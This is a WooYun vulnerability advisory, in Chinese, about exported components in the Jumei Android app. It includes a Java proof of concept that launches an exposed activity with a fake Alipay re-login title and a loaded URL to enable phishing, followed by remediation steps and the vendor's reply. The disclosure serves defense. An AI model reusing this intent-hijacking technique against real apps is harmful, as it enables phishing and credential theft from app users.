漏洞概要
关注数(24)
关注此漏洞
漏洞标题:聚美优品安卓客户端组件暴露可实现钓鱼
提交时间:2015-08-07 10:21
修复时间:2015-11-05 11:58
公开时间:2015-11-05 11:58
漏洞类型:设计错误/逻辑缺陷
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-08-07: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-10: 细节向第三方安全合作伙伴开放
2015-10-01: 细节向核心白帽子及相关领域专家公开
2015-10-11: 细节向普通白帽子公开
2015-10-21: 细节向实习白帽子公开
2015-11-05: 细节向公众公开
简要描述:
聚美优品安卓客户端容易出现钓鱼
详细说明:
版本3.由于组件暴露问题,第三方应用可以启动应用,并可以打开钓鱼网站。
漏洞证明:
这里打开一个支付宝登陆界面POC。
private void jumei_productus_poc() {
Intent v2=new Intent();
v2.setClassName("com.jm.android.jumei", "com.jm.android.jumei.ProductUsageShowActivity");
v2.putExtra("key_title", "重新登录支付宝");
v2.putExtra("key_lable", "xxx000");
v2.putExtra("key_url", "http://auth.alipay.com");
v2.putExtra("key_message", "xx000");
v2.putExtra("key_result", 100);
v2.putExtra("key_nret", 1);
v2.putExtra("key_product_type", true);
startActivity(v2);
}
假设我用的网址是钓鱼的,而且还可以执行JavaScript代码,后果不堪设想。
主要是因为Activity暴露,app中暴露的很多,容易产生拒绝服务等。
manifest文件中很多activity,receiver,service暴露,RequestMessageActivity,JumpDealDetailActivity不一一列举。
修复方案:
1.相应组件android:exported="false"
2.加签名才能访问。
3.拒绝服务,有的是空intent,没有判断getIntent==null.
版权声明:转载请注明来源 hh88@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-08-07 11:56
厂商回复:
太感谢了!这是头一回有人帮我们挖到Android的漏洞,马上修复。
最新状态:
暂无
漏洞评价:
评论
-
2015-10-17 12:44 |
mango ( 核心白帽子 | Rank:1721 漏洞数:254 | 我有个2b女友!)
-
2015-10-22 15:58 |
Me_Fortune ( 普通白帽子 | Rank:220 漏洞数:79 | The quiter you are,the more you're able ...)
-
2015-10-22 17:42 |
咚咚呛 ( 普通白帽子 | Rank:116 漏洞数:10 | 我是一只小毛驴咿呀咿呀呦~~)